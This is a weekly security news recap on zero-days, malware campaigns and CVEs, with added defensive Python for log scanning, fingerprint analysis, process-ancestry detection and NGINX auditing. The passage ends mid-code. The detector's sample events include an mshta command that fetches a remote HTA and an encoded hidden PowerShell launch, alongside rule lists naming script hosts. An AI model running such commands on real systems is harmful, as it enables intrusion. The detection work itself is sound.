Security news rarely moves in a straight line. This week, it feels more like a series of sharp turns, some happening quietly in the background, others playing out in public view. The details are different, but the pressure points are familiar.
Across devices, cloud services, research labs, and even everyday apps, the line between normal behavior and hidden risk keeps getting thinner. Tools meant to protect, update, or improve systems are also becoming pathways when something goes wrong.
This recap gathers the signals in one place. Quick reads, real impact, and developments that deserve a closer look before they become next week’s bigger problem.
⚡ Threat of the Week
Dell RecoverPoint for VMs Zero-Day Exploited — A maximum severity security vulnerability in Dell RecoverPoint for Virtual Machines has been exploited as a zero-day by a suspected China-nexus threat cluster dubbed UNC6201 since mid-2024. The activity involves the exploitation of CVE-2026-22769 (CVSS score: 10.0), a case of hard-coded credentials affecting versions prior to 6.0.3.1 HF1. Per Google, the hard-coded credential relates to an “admin” user for the Apache Tomcat Manager instance that could be used to authenticate to the Dell RecoverPoint Tomcat Manager, upload a web shell named SLAYSTYLE via the “/manager/text/deploy” endpoint, and execute commands as root on the appliance to drop the BRICKSTORM backdoor and its newer version dubbed GRIMBOLT.
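The hard-coded Manager account turns Tomcat's Manager text interface into the deployment path for the web shell, and that step leaves a trace in the ordinary access log. As an added example (not code from Dell, Google or the original article), the Python below scans Tomcat access-log lines in the default AccessLogValve "common" pattern, flags every Manager request, ranks successful deploy/undeploy/reload calls from hosts outside an allowlist highest, and extracts the deployed context path so responders know which webapp directory to pull. The log lines are constructed for the example and the trusted-hosts allowlist is an assumed parameter; neither comes from the incident.

```python
import re
from dataclasses import dataclass
from typing import FrozenSet, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Tomcat's default AccessLogValve "common" pattern
# (%h %l %u %t "%r" %s %b). Made up for this example; not logs from the
# Dell RecoverPoint incident.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Mar/2026:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - admin [10/Mar/2026:09:15:11 +0000] "GET /manager/text/list HTTP/1.1" 200 210
203.0.113.7 - admin [10/Mar/2026:09:15:13 +0000] "PUT /manager/text/deploy?path=/x&update=true HTTP/1.1" 200 48
203.0.113.7 - - [10/Mar/2026:09:15:20 +0000] "POST /x/index.jsp HTTP/1.1" 200 1044
10.0.0.9 - - [10/Mar/2026:09:16:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.4 - ops [10/Mar/2026:09:17:30 +0000] "GET /manager/text/serverinfo HTTP/1.1" 200 -
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Manager commands that change what the server is running; a success here from
# an unexpected host is the web-shell deployment step.
MUTATING_MANAGER_PATHS = ("/manager/text/deploy", "/manager/text/undeploy",
                          "/manager/text/reload", "/manager/html/upload")


@dataclass
class Finding:
    host: str
    user: str
    time: str
    method: str
    path: str
    status: int
    severity: str


def parse_line(line: str) -> Optional[dict]:
    """Parse one common-format line; None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def scan_access_log(text: str, trusted_hosts: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Flag every Manager request. A successful mutating call from a host outside
    the allowlist is 'high', the same from an allowlisted host is 'medium', other
    successful Manager calls are 'low', and rejected attempts (401/403) are 'info'
    because they still show the endpoint is reachable and being probed."""
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None or not rec["path"].startswith("/manager/"):
            continue
        path_only = rec["path"].split("?", 1)[0]
        mutating = path_only.startswith(MUTATING_MANAGER_PATHS)
        success = 200 <= rec["status"] < 300
        if mutating and success:
            severity = "medium" if rec["host"] in trusted_hosts else "high"
        elif success:
            severity = "low"
        else:
            severity = "info"
        findings.append(Finding(rec["host"], rec["user"], rec["time"], rec["method"],
                                rec["path"], rec["status"], severity))
    return findings


def deployed_contexts(findings: List[Finding]) -> List[str]:
    """Context paths pushed through /manager/text/deploy (its path= parameter),
    i.e. the webapp directories an investigator should pull and inspect."""
    contexts = []
    for f in findings:
        parts = urlsplit(f.path)
        if parts.path == "/manager/text/deploy" and f.severity in ("high", "medium"):
            contexts.extend(parse_qs(parts.query).get("path", []))
    return contexts


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG, trusted_hosts=frozenset({"198.51.100.4"})):
        print(f"[{f.severity:6}] {f.host} {f.user} {f.method} {f.path} -> {f.status}")
    print("deployed contexts:", deployed_contexts(scan_access_log(SAMPLE_ACCESS_LOG)))
```

On an appliance where nobody should be touching the Manager application at all, the allowlist can be left empty so that any successful deploy is 'high'; the 401 hit on /manager/html is kept as 'info' because a reachable Manager login page is itself a finding worth raising with the owner.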
🔔 Top News
- Former Google Engineers Indicted Over Alleged Trade Secret Theft — Two former Google engineers and the husband of one of them have been indicted in the U.S. for allegedly stealing trade secrets from the search giant and other tech firms and transferring the information to unauthorized locations, including Iran. Samaneh Ghandali, 41, and her husband Mohammadjavad Khosravi (aka Mohammad Khosravi), 40, along with her sister Soroor Ghandali, 32, were accused of conspiring to commit trade secret theft from Google and other leading technology companies, theft and attempted theft of trade secrets, and obstruction of justice. The defendants are said to have transferred hundreds of sensitive files to a third-party communications platform and then accessed them from Iran after Samaneh Ghandali and Khosravi traveled to Iran in December 2023.
- PromptSpy Android Malware Abuses Gemini for Persistence — Researchers at ESET analyzed what they described as the first Android malware to leverage generative artificial intelligence (AI) during its execution to set up persistence. Called PromptSpy, the malware uses Google Gemini to analyze the current screen and provide step-by-step instructions on how to ensure the malicious app remains pinned in the recent apps list by taking advantage of the operating system’s accessibility services. There are signs that the campaign is likely targeting users in Argentina. Google told The Hacker News that it did not find any apps containing the malware being distributed via Google Play.
- Kenyan Dissident’s Phone Cracked Using Cellebrite’s Tool — Evidence has emerged that Kenyan authorities used a commercial forensic extraction tool manufactured by Israeli company Cellebrite to break into a prominent dissident’s phone. The Citizen Lab said it found the indicators on a personal phone belonging to Boniface Mwangi, a Kenyan pro-democracy activist who has announced plans to run for president in 2027. In a related development, Amnesty International found that the iPhone belonging to Teixeira Cândido, an Angolan journalist and press freedom advocate, was successfully targeted by Intellexa’s Predator spyware in May 2024 after he opened an infected link received via WhatsApp.
- New Pre-Installed Android Malware Keenadu Detected in the Wild — A new Android backdoor embedded deep in device firmware can silently harvest data and remotely control the device, Kaspersky said. The malware, codenamed Keenadu, is said to have been delivered by means of compromised firmware pushed through an over-the-air (OTA) update, which lets it run with high privileges from the moment the device is activated and gives attackers extensive control over it. It can also infect other installed apps, deploy additional software from APK files, and grant those apps any permission available on the system. Keenadu triggers only under specific conditions, remaining dormant on devices set to Chinese languages or time zones and on those that lack the Google Play Store and Google Play Services. Its distribution is not limited to pre-installed system components: in some cases, the malware has also been observed embedded within applications distributed through Android app stores. Because the malicious components live in firmware rather than being installed later as apps, affected users have little ability to detect or remove them through conventional methods. The activity has not been attributed to a specific threat actor, but Kaspersky said the developers demonstrated “a deep understanding of the Android architecture, the app startup process, and the core security principles of the operating system.”
- Password Managers’ Zero Knowledge Claims Put to Test — A new study undertaken by researchers from ETH Zurich and Università della Svizzera italiana has undermined claims from Bitwarden, Dashlane, and LastPass that the password managers guarantee “zero knowledge” — an assurance that states there is no way for a malicious insider or a threat actor that has compromised the cloud infrastructure to access the vault data. Specifically, it found that these claims are not true under all circumstances, particularly when account recovery is in place, or password managers are set to share vaults or organize users into groups. The most severe of the attacks, targeting Bitwarden and LastPass, could allow an insider or attacker to read or write to the contents of entire vaults. Other attacks enable reading and modification of shared vaults. “Attacks on the provider server infrastructure can be prevented by carefully designed operational security measures, but it is well within the bounds of reason to assume that these services are targeted by sophisticated nation-state-level adversaries, for example via software supply-chain attacks or spear-phishing,” the researchers said.
🔥 Trending CVEs
New vulnerabilities surface daily, and attackers move fast. Reviewing and patching early keeps your systems resilient.
Here are this week’s most critical flaws to check first — CVE-2026-22769 (Dell RecoverPoint for Virtual Machines), CVE-2026-25926 (Notepad++), CVE-2026-26119 (Microsoft Windows Admin Center), CVE-2026-2329 (Grandstream GXP1600 series), CVE-2025-65717 (Live Server), CVE-2026-1358 (Airleader Master), CVE-2026-25108 (FileZen), CVE-2026-25084, CVE-2026-24789 (ZLAN), CVE-2026-2577 (Nanobot), CVE-2026-25903 (Apache NiFi), CVE-2026-26019 (@langchain/community), CVE-2026-1670 (Honeywell CCTV), CVE-2025-7740 (Hitachi Energy SuprOS), CVE-2025-61928 (better-auth), CVE-2026-20140 (Splunk Enterprise for Windows), CVE-2026-27118 (@sveltejs/adapter-vercel), CVE-2026-27099, CVE-2026-27100 (Jenkins), CVE-2026-24733 (Apache Tomcat), CVE-2026-2648, CVE-2026-2649, CVE-2026-2650 (Google Chrome), CVE-2025-29969 (Windows Fundamentals), CVE-2025-64127, CVE-2025-64128, CVE-2025-64129, CVE-2025-64130 (Zenitel), CVE-2025-32355, CVE-2025-59793 (TRUfusion Enterprise), CVE-2026-1357 (WPvivid Backup plugin), CVE-2025-9501 (W3 Total Cache plugin), CVE-2025-13818 (ESET Management Agent for Windows), CVE-2025-11730 (ZYXEL ATP/USG series), CVE-2025-67303 (ComfyUI), and Joomla! unauthenticated file read, unauthenticated file deletion, and SQL injection vulnerabilities in Novarain/Tassos Framework (no CVEs).
🎥 Cybersecurity Webinars
- Learn How to Future-Proof Your Encryption Before Quantum Breaks It → Quantum computing is accelerating, and attackers are harvesting encrypted data for future decryption. This webinar covers practical post-quantum cryptography, hybrid encryption, and Zero Trust strategies to protect sensitive data before quantum threats become real.
- Beyond the Model: Securing AI Agents in Real-World Systems → As organizations deploy autonomous AI agents with tool access and system permissions, the attack surface shifts beyond the model itself. This session explores indirect prompt injection, privilege escalation, multi-agent risk, and practical strategies to secure real-world AI systems without breaking workflows.
- Pressure-Test Your Controls With Continuous CTI-Driven Validation → Security budgets are rising, yet breaches continue. This session shows how to move beyond assumption-based testing to continuous, CTI-driven exposure validation—pressure-testing controls against real attacker behavior, automating security checks, and building measurable resilience without overspending.
📰 Around the Cyber World
- Online Store Infected with Skimmer — The online store of a top-10 global supermarket chain has been infected with skimmer malware that checks for logged-in admin users of WordPress, Magento, PrestaShop, and OpenCart in order to evade detection. “The attack combines two components: a seemingly off-the-shelf skimmer framework with integrations for four popular e-commerce platforms, and a carefully localized fake payment form,” Sansec said. “This fraud is called ‘double-tap skimming’: customers enter their card details into the fake form first, then see the real payment form where they have to enter their data again. Most people just accept that and complete the order, unaware their data was just stolen.” The breach coincides with a broader wave of attacks targeting PrestaShop stores. In January 2026, PrestaShop urged merchants to check their stores for skimmers injected into theme template files.
- Nigeria Arrests 7 for Running Scam Center — Nigerian authorities arrested seven suspects who ran a cyber scam center in the city of Agbor. The group used social media ads to lure U.K. victims to bogus crypto investment portals. Hundreds of fake Facebook accounts were potentially used to target victims. “Using these bogus social media accounts to impersonate cryptocurrency traders, they targeted people who used legitimate investment platforms, sharing false positive reviews to lure people into sending money to the fraudsters,” the U.K. National Crime Agency (NCA) said. Meta said it’s working with law enforcement to identify and remove all accounts used in these operations. “The group used fake social media accounts impersonating cryptocurrency traders, along with fraudulent Facebook groups featuring fabricated testimonials, to target individuals engaging with legitimate investment platforms,” it added. In the first half of 2025, the company noted it took down 12 million accounts across Facebook, Instagram, and WhatsApp associated with criminal scam centers.
- LonTalk Protocol Analyzed — Claroty has called attention to security risks posed by the LonTalk proprietary protocol that’s used for device-to-device communication in building management and automation systems (BMS and BAS). “LonTalk should not be underestimated as an attack vector for hacktivists and criminal entities, especially as BMS is enabled over IP networks,” the company said. “LonTalk is certainly still relevant to BMS cybersecurity discussions, especially as BMS finds its way online for a number of strategic and bottom-line reasons. Commercial real estate, retail, hospitality, and data center sectors rely on BMS systems such as HVAC (heating, ventilation, and air conditioning), lighting, energy management, and security. Previously, these systems were operated independently by facility management, but they are now increasingly connected and integrated through advanced BMS and BAS capabilities.”
- GrayCharlie Uses Compromised WordPress Sites to Deliver RATs — A threat actor known as GrayCharlie (aka HANEYMANEY, SmartApeSG, and ZPHP) has been observed compromising WordPress sites and injecting them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. The threat first emerged in mid-2023. “These infections often progress to the deployment of StealC and SectopRAT,” Recorded Future said. While most compromised websites appear to be opportunistic and span numerous industries, the cybersecurity company said it identified a cluster of U.S. law firm sites that were likely compromised around November 2025, likely through a supply chain attack involving a shared IT provider.
- Why Patch Everything is a Recipe for Burnout — Dataminr’s 2026 Cyber Threat Landscape Report has revealed that the “patching treadmill is broken,” driven by reliance on CVSS scores and a surge in patch bypasses, where vendors don’t address the root causes of issues, thereby opening the door to re-exploitation by threat actors days or weeks after the initial patch was released. “With thousands of CVEs disclosed every year, security teams can’t just rely on the common vulnerability severity score (CVSS) to decide what to patch,” Dataminr said. “These scores focus on the technical impacts of a vulnerability, but tell you very little about actual risk to your organization. There has to be a balance between the CVSS, potential economic impact, exposure, and likelihood of being targeted. The focus has to shift from ‘is this a critical CVE?’ to ‘is this specific flaw being targeted in my sector, and can the attacker actually reach my crown jewels through it?'”
- Phishing Campaigns in Taiwan Deliver Winos 4.0 — Targeted phishing campaigns have hit Taiwan with themes designed to exploit local business processes and ultimately deliver a known remote access trojan called Winos 4.0 (aka ValleyRAT) and malicious plugins through weaponized attachments or embedded links. “The lures mimic official communications, such as tax audit notifications, tax filing software installers, and cloud-based e-invoice downloads,” Fortinet FortiGuard Labs said. “Over the past two months, we have identified various delivery techniques, including malicious LNK files used for a downloader, DLL side-loading via legitimate executables to load shellcode, and BYOVD (Bring Your Own Vulnerable Driver) attacks using ‘wsftprm.sys.'” The driver is used to terminate processes associated with a hard-coded list of security products. The use of Winos 4.0 is unique to a Chinese cybercrime group known as Silver Fox.
- Teams Gets Brand Impersonation Protection — Microsoft said it will start rolling out Brand Impersonation Protection for Teams Calling starting mid-March 2026 to detect and warn users of suspicious external calls to reduce fraud risks. “It will be enabled by default, requires no admin action, and aims to enhance security without changing existing policies,” Microsoft said. The tech giant is also planning to introduce a “Report a Call” feature by mid-March 2026 to let users flag suspicious one-to-one calls.
- 2025 Records 508 ICS advisories from CISA — Between March 2010 and January 31, 2026, CISA/ICS-CERT published 3,637 ICS advisories about 12,174 vulnerabilities affecting 2,783 products from 689 vendors, Forescout said. 2025 recorded a high of 508 ICS advisories, covering 2,155 vulnerabilities across various products and vendors. The development marks the first year exceeding 500 advisories. The average severity rose to a CVSS score of 8.07 and 82% of advisories were classified as high or critical. In contrast, back in 2010, the average was 6.44, and it was classified as medium severity.
- Microsoft Unveils LiteBox — Microsoft has released LiteBox, a Rust-based project described as a “sandboxing library OS that drastically cuts down the interface to the host, thereby reducing attack surface.” Developed in collaboration with the Linux Virtualization Based Security (LVBS) project, the goal is to sandbox applications by minimizing host system interactions and supporting various use cases like running Linux programs on Windows or sandboxing Linux applications.
- ChainedShark Targets Chinese Research Sector — A new APT group codenamed ChainedShark is targeting China’s academic and scientific research sector. Active since May 2024, the group’s main focus has been the collection of intelligence on Chinese diplomacy and marine technology. Past victims include universities and research institutions specializing in international relations. Its arsenal integrates N-day vulnerability exploits and highly complex custom trojans such as LinkedShell. “ChainedShark exhibits clear geopolitical motivations, focusing its attacks on experts and scholars in international relations and marine sciences within Chinese academic and research institutions,” NSFOCUS said. “The group demonstrates strong social engineering capabilities, crafting fluent, natural, and high-quality Chinese-language lures. It skillfully exploits professional scenarios—such as conference invitations and academic call-for-papers—to create deceptive attack vectors, effectively lowering targets’ guard.”
- Samsung Weather App as a Way for User Fingerprinting — New research has uncovered that Samsung’s pre-installed weather app is fingerprinting its users by means of a “placeid” parameter that’s trivially observable by the weather API provider. A test conducted on 42 Samsung devices found that the fingerprints were unique per device and survived IP changes across providers and VPN use. “Analysis of 9,211 weather API requests from 42 Samsung device owners over five days demonstrates that placeid combinations produce unique user identifiers in 96.4% of cases,” Buchodi’s Threat Intel said. “Every user with two or more saved locations had a fingerprint shared by no one else in the dataset.” This turns saved locations into a persistent cross-session tracking identifier: each placeid identifies one location, and the fingerprint is the aggregate of all placeid values tied to a device’s saved locations. In other words, a user who tracks two or more locations can be uniquely identified from that combination alone.
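The fingerprint described above is nothing more than the set of placeid values a device requests, so its strength can be measured as an anonymity set: how many devices in the observed population share the same set. As an added example, not code or data from the researchers, the Python below builds that set per device from constructed request records, computes each device’s k (the number of devices sharing its fingerprint) and the fraction of devices that are unique, and shows how a set observed from a new IP address links back to a previously seen device. The device IDs and placeid strings are made up for the example.

```python
from collections import Counter
from typing import Dict, FrozenSet, Iterable, List, Tuple

# Constructed request records: (device id, placeid seen in one weather API call).
# Made up for this example; not data from the Samsung research.
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("dev-01", "p:berlin"), ("dev-01", "p:munich"),
    ("dev-02", "p:berlin"),
    ("dev-03", "p:berlin"),
    ("dev-04", "p:london"), ("dev-04", "p:paris"), ("dev-04", "p:london"),
    ("dev-05", "p:paris"), ("dev-05", "p:london"),
    ("dev-06", "p:oslo"), ("dev-06", "p:bergen"),
]

Fingerprint = FrozenSet[str]


def fingerprints(requests: Iterable[Tuple[str, str]]) -> Dict[str, Fingerprint]:
    """Aggregate each device's placeid values into an unordered set. Repeated
    polls of the same location and request order do not change it, which is
    what makes the set stable across sessions and IP changes."""
    seen: Dict[str, set] = {}
    for device, placeid in requests:
        seen.setdefault(device, set()).add(placeid)
    return {device: frozenset(ids) for device, ids in seen.items()}


def anonymity_sets(fps: Dict[str, Fingerprint]) -> Dict[str, int]:
    """k per device: how many devices in the population carry the same set.
    k == 1 means the fingerprint alone identifies the device."""
    counts = Counter(fps.values())
    return {device: counts[fp] for device, fp in fps.items()}


def unique_fraction(fps: Dict[str, Fingerprint], min_locations: int = 1) -> float:
    """Share of devices with at least min_locations saved whose fingerprint is
    unique in the whole population (the research's 96.4% is this kind of ratio)."""
    k = anonymity_sets(fps)
    eligible = [d for d, fp in fps.items() if len(fp) >= min_locations]
    if not eligible:
        return 0.0
    return sum(1 for d in eligible if k[d] == 1) / len(eligible)


def link(fps: Dict[str, Fingerprint], observed: Iterable[str]) -> List[str]:
    """Candidate devices for a placeid set seen from a new IP or VPN exit: no
    entries is a never-seen device, one entry is a confident re-identification,
    several entries mean the observer can only narrow to that anonymity set."""
    target = frozenset(observed)
    return sorted(device for device, fp in fps.items() if fp == target)


if __name__ == "__main__":
    fps = fingerprints(SAMPLE_REQUESTS)
    for device, k in anonymity_sets(fps).items():
        print(device, sorted(fps[device]), "k =", k)
    print("unique overall:", unique_fraction(fps))
    print("unique with >= 2 locations:", unique_fraction(fps, 2))
    print("new IP, set {oslo, bergen} ->", link(fps, ["p:bergen", "p:oslo"]))
```

The constructed data deliberately includes two devices (dev-04 and dev-05) with identical two-location sets, so the example also shows the one thing that defeats this fingerprint: sharing exactly the same set of saved places with someone else in the observer’s population.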
- DDoS Attacks Jump 168% in 2025 — A new analysis released by Radware has revealed that the number of web DDoS attacks climbed 101.4% in 2025 compared to 2024, and bad bot activity increased 91.8%, fueled by generative AI tools. Malicious web application and API transactions rose 128% year over year. Network-layer DDoS attacks increased 168.2% year over year, with peak attack volumes reaching almost 30 terabits per second (Tbps). “Technology, telecommunications, and financial services were the most targeted sectors, together accounting for the majority of large-scale network DDoS campaigns,” Radware said. “The technology sector alone represented 45% of all network-layer DDoS attacks, up sharply from 8.77% in 2024.” Hacktivism, fueled by geopolitical and ideological conflict, remained a primary driver of DDoS activity.
- Over 2,500 Malicious Images Flagged on Docker Hub — Qualys said it discovered more than 2,500 malicious images hosted on the Docker Hub. Of these, around 70% of them contained a hidden cryptominer. Others included backdoors, exploits, ransomware, keyloggers, and proxy infrastructure. “Pulling container images from public registries is no longer a neutral operational step,” the company said. “It is a trust decision that directly affects infrastructure stability, cloud costs, and security risk.”
- Nearly 1T Scam Ads Served on Social Media in 2025 — According to new findings from Juniper Research, online tech platforms made £3.8 billion ($5.2 billion) in revenue from malicious or scam ads in Europe alone. Nearly 1 trillion scam ads were served to social media users in 2025. The analyst firm also revealed earlier this month that e-commerce fraud will rise from $56 billion in 2025 to $131 billion in 2030, a 133% increase over the period.
- Malicious npm Packages Hijack Gambling Outcomes — Researchers have discovered malicious npm packages, json-bigint-extend, jsonfx, and jsonfb, that mimic the legitimate json-bigint library, but contain functionality to install two backdoors to execute additional code fetched from an endpoint, run arbitrary SQL commands, download file contents, and list server-side files and directories. “Upon further inspection of the fetched code, it seems to be a complex cashflow-rewriting system used to manipulate a gambling game,” Aikido said. “The most sophisticated component of this backdoor is the fixFlow function, a balance manipulation engine that retroactively rewrites a user’s gambling history to achieve a desired balance change while maintaining the appearance of legitimate gameplay.” It’s suspected that the malware is designed to target a gambling app named Bappa Rummy. It’s no longer listed on the official Google Play Store.
- Telegram Disputes Claims About Encryption — The head of Russia’s FSB security service, Alexander Bortnikov, accused Telegram of harboring criminal activity and failing to act on reports from Russian authorities. Bortnikov said Telegram ignored more than 150,000 removal requests from Russian authorities. Russian officials also claimed that foreign intelligence services could read messages sent by Russian soldiers over the app. The messaging platform said “no breaches of Telegram’s encryption have ever been found.” The development comes as Russia started blocking and throttling Telegram traffic last week.
- Nigerian Man Sentenced to Eight Years in Prison for Bogus Tax Refund Scheme — A 37-year-old Nigerian man named Matthew A. Akande, who was living in Mexico, was sentenced to eight years in prison in the U.S. for his involvement in a criminal operation that involved unauthorized access to the computer networks of tax preparation firms in Massachusetts. Between approximately June 2016 and June 2021, Akande conspired to use stolen taxpayer information to file over 1,000 fraudulent tax returns seeking millions of dollars in tax refunds, the Justice Department said. The defendant was also ordered to pay $1,393,230 in restitution. He was arrested in October 2024 in the U.K. and extradited to the U.S. in March 2025. “To carry out the scheme, Akande caused fraudulent phishing emails to be sent to five Massachusetts tax preparation firms,” the department said. “The emails purported to be from a prospective client seeking the tax preparation firms’ services, but in truth were used to trick the firms into downloading remote access trojan malicious software (RAT malware), including malware known as Warzone RAT. Akande used the RAT malware to obtain the PII and prior year tax information of the tax preparation firms’ clients, which Akande then used to cause fraudulent tax returns to be filed seeking refunds.” Warzone RAT’s infrastructure was seized by the U.S. Federal Bureau of Investigation in February 2024.
- New Campaigns Distribute njRAT, Pulsar RAT, XWorm, and Prometei — In a new campaign, threat actors are leveraging the njRAT remote access trojan to deliver the MassLogger infostealer. Another campaign has been found to use a Donut loader to distribute Pulsar RAT as part of a sophisticated, multi-stage malware attack. What’s notable about this activity is that Pulsar RAT is used to actively control a compromised host, allowing an attacker to initiate a real-time chat session with the victim to interact and probe system usage. Also discovered are two campaigns using phishing emails to distribute XWorm: One uses a JavaScript dropper to target Brazilian users, and another begins with phishing emails delivering a malicious Excel attachment to targeted users. The Excel file exploits CVE-2018-0802, a memory corruption flaw in Office patched in 2018, to download and execute an HTA file on the victim’s device, which, in turn, triggers PowerShell to download and run a fileless .NET module directly into memory. The module then uses process hollowing to inject and execute the XWorm payload within a newly created MSBuild.exe process. Last but not least, Windows servers are being targeted by threat actors to infect them with a botnet known as Prometei. “It features extensive capabilities, including remote control functionality, credential harvesting, crypto-mining (Monero), lateral movement, command-and-control (C2) over both the clearweb and TOR network, and self-preservation measures that harden compromised systems against other threat actors, to maintain exclusive access,” eSentire said.
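The XWorm chain above (Excel to mshta to PowerShell to a hollowed MSBuild.exe) is the kind of parent-child sequence that process-creation telemetry catches even though every binary involved is a signed Microsoft one. As an added example, not code from eSentire or the original article, the Python below runs three ancestry rules over constructed Sysmon-style process events: an Office application spawning a script host, a script host launching PowerShell with an encoded command, and MSBuild.exe started with no project file under shell or script-host ancestry. The event records, image paths and command lines are constructed for the example and a benign developer build is included to show what does not fire.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (Sysmon Event ID 1 style, simplified).
# Made up for this example; not telemetry from the campaigns described.
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" C:\Users\u\Downloads\invoice.xls'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.23/a.hta"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe"},
    # benign comparison: a developer build started from a terminal
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe app.csproj /t:Build"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PROJECT_EXTS = (".csproj", ".vbproj", ".proj", ".sln")
# -e, -enc and -encodedcommand, case-insensitive, as a separate argument
ENCODED_FLAG = re.compile(r"(?i)\s-e(?:nc(?:odedcommand)?)?\s")


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events: List[Dict], pid: int) -> List[str]:
    """Image names from the process itself up to the root, child first."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: List[Dict]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, chain) for every event matching one of three rules."""
    findings = []
    for e in events:
        name = image_name(e["image"])
        chain = ancestry(events, e["pid"])
        parents = chain[1:]
        parent = parents[0] if parents else ""
        pretty = " <- ".join(chain)
        # Rule 1: Office application spawning a script host (maldoc to HTA stage)
        if name in SCRIPT_HOSTS and parent in OFFICE_APPS:
            findings.append(("office_spawns_script_host", e["pid"], pretty))
        # Rule 2: script host launching PowerShell with an encoded command
        if name in {"powershell.exe", "pwsh.exe"} and parent in SCRIPT_HOSTS \
                and ENCODED_FLAG.search(e["cmdline"] + " "):
            findings.append(("script_host_spawns_encoded_powershell", e["pid"], pretty))
        # Rule 3: MSBuild.exe with no project file under shell/script/Office ancestry.
        # A hollowed MSBuild.exe exists only to host injected code, so it is started
        # without a project argument; a real build names one.
        if name == "msbuild.exe":
            args = e["cmdline"].split()[1:]
            has_project = any(a.lower().endswith(PROJECT_EXTS) for a in args)
            suspicious_parent = any(p in SHELLS | SCRIPT_HOSTS | OFFICE_APPS for p in parents)
            if not has_project and suspicious_parent:
                findings.append(("msbuild_without_project_hollowing_candidate", e["pid"], pretty))
    return findings


if __name__ == "__main__":
    for rule, pid, chain in detect(EVENTS):
        print(f"{rule:45} pid={pid} {chain}")
```

Rule 3 is deliberately a "candidate" rather than a verdict: a project-file argument does not prove a build is benign (MSBuild will happily compile an inline-task payload), but an argument-less MSBuild.exe under a PowerShell parent that itself came from mshta.exe is the specific shape the hollowing stage in this campaign leaves behind.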
🔧 Cybersecurity Tools
- Gixy Next → It is an open-source security analysis tool designed to audit NGINX configurations for common misconfigurations and vulnerabilities. It scans configuration files to detect issues such as unsafe directives, incorrect access controls, and insecure proxy settings that could expose applications to attacks. Built as a successor to the original Gixy project, it aims to provide updated checks and improved rule coverage for modern NGINX deployments.
- The-One-WSL-BOF → It is an open-source Cobalt Strike Beacon Object File that lets operators interact with Windows Subsystem for Linux (WSL) directly from a Beacon session. It can list WSL distributions and run commands inside them without launching wsl.exe, reducing visible process activity and some logging artifacts.
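The kind of audit Gixy Next performs is easy to reproduce for a few well-known NGINX pitfalls. As an added example (not Gixy Next’s own code or rules), the Python below parses a config into directives and blocks and runs three checks modelled on classic Gixy findings: alias traversal (a prefix location without a trailing slash paired with an alias that has one), add_header redefinition (a single add_header in a nested block silently drops every header set by the parent), and HTTP splitting through the URL-decoded $uri and $document_uri variables in return, rewrite, proxy_pass or add_header. The weak and corrected configs are constructed for the example.

```python
import re
from typing import List, Optional, Tuple

Directive = Tuple[str, List[str], Optional[list]]  # (name, args, children or None)
TOKEN_RE = re.compile(r"[{};]|[^\s{};]+")


def parse(text: str) -> List[Directive]:
    """Minimal NGINX config parser: ';' ends a directive, '{ }' delimit a block,
    '#' starts a comment. No quoted strings or include handling."""
    tokens: List[str] = []
    for raw in text.splitlines():
        tokens.extend(TOKEN_RE.findall(raw.split("#", 1)[0]))
    pos = 0

    def block() -> List[Directive]:
        nonlocal pos
        items: List[Directive] = []
        while pos < len(tokens) and tokens[pos] != "}":
            words: List[str] = []
            while pos < len(tokens) and tokens[pos] not in ("{", ";"):
                words.append(tokens[pos])
                pos += 1
            if pos >= len(tokens) or not words:
                raise ValueError("malformed directive near: " + " ".join(words))
            if tokens[pos] == ";":
                pos += 1
                items.append((words[0], words[1:], None))
            else:
                pos += 1                      # consume '{'
                children = block()
                pos += 1                      # consume '}'
                items.append((words[0], words[1:], children))
        return items

    return block()


def check_alias_traversal(items: List[Directive]) -> List[str]:
    """location /static { alias /data/static/; } maps /static../x to /data/static/../x.
    Only prefix locations (no modifier or ^~) are affected."""
    out = []
    for name, args, children in items:
        if name == "location" and children is not None and args:
            modifier = args[0] if len(args) > 1 else ""
            prefix = args[-1]
            if modifier in ("", "^~") and not prefix.endswith("/"):
                for cname, cargs, _ in children:
                    if cname == "alias" and cargs and cargs[0].endswith("/"):
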